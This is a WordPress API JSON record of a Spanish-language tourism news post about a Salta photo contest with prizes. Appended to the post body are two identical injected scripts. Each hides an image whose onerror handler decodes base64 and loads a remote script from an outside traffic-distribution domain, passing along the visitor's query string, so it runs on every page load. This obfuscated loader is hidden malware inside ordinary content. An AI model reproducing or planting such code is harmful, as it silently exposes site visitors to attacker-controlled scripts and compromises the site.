{"id":3955,"date":"2024-04-25T19:57:17","date_gmt":"2024-04-25T22:57:17","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3955"},"modified":"2025-08-13T23:56:39","modified_gmt":"2025-08-14T02:56:39","slug":"el-mejor-recuerdo-salteno-tiene-premio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3955","title":{"rendered":"El mejor recuerdo salte\u00f1o tiene premio"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-482a3fac7aa1c8470bf8ab73d8e7903e\" style=\"background-color:#800a28\"><em>Desde hoy hasta el 12 de mayo, visitantes podr\u00e1n subir su foto de Salta en una publicaci\u00f3n en redes sociales con el #recuerdosalte\u00f1o y @visitsalta para participar as\u00ed del concurso de fotograf\u00eda del que se elegir\u00e1n tres ganadores.<\/em><\/h4>\n\n\n\n<p>En el marco de las 10 medidas que implementan el sector p\u00fablico y privado de la provincia para incentivar la demanda tur\u00edstica en Salta durante abril, mayo y junio, se lanz\u00f3 hoy &nbsp;un concurso de fotograf\u00eda por redes sociales.<\/p>\n\n\n\n<p>Hasta el 12 de mayo , visitantes podr\u00e1n subir su foto de Salta en una publicaci\u00f3n en redes sociales con el #recuerdosalte\u00f1o y @visitsalta para participar del concurso donde se elegir\u00e1n tres ganadores. Se puede subir una foto de un paisaje, gastronom\u00eda, o de lo que m\u00e1s les haya gustado de Salta y lo guarden como el mejor recuerdo.<\/p>\n\n\n\n<p>El jurado compuesto por&nbsp;<strong>Mercedes Garcia<\/strong>&nbsp;(@euforiaar),&nbsp;<strong>Antonio Tita<\/strong>&nbsp;(@antiotita) y&nbsp;<strong>Ossian Lindholm<\/strong>&nbsp;(@ossian.lindholm) elegir\u00e1 a las diez mejores fotograf\u00edas y el p\u00fablico terminar\u00e1 de seleccionar a los tres ganadores que se llevar\u00e1n: tres experiencias en Salta con estad\u00edas, tickets y entradas a los mejores atractivos y museos de la Provincia.<\/p>\n\n\n\n<p>Cabe destacar que este concurso permitir\u00e1 generar mayor interacci\u00f3n, visibilidad y aumentar los seguidores en redes as\u00ed &nbsp;como tambi\u00e9n incrementar la demanda tur\u00edstica a corto plazo del Destino Salta.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-mejor-recuerdo-saltenio-tiene-premio-95308\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde hoy hasta el 12 de mayo, visitantes podr\u00e1n subir su foto de Salta en una publicaci\u00f3n en redes sociales con el #recuerdosalte\u00f1o y @visitsalta para participar as\u00ed del concurso de fotograf\u00eda del que se elegir\u00e1n tres ganadores. En el marco de las 10 medidas que implementan el sector p\u00fablico y privado de la provincia [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3956,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,17],"tags":[],"class_list":{"0":"post-3955","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3955"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3955"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3955\/revisions"}],"predecessor-version":[{"id":6796,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3955\/revisions\/6796"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3956"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3955"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3955"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3955"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}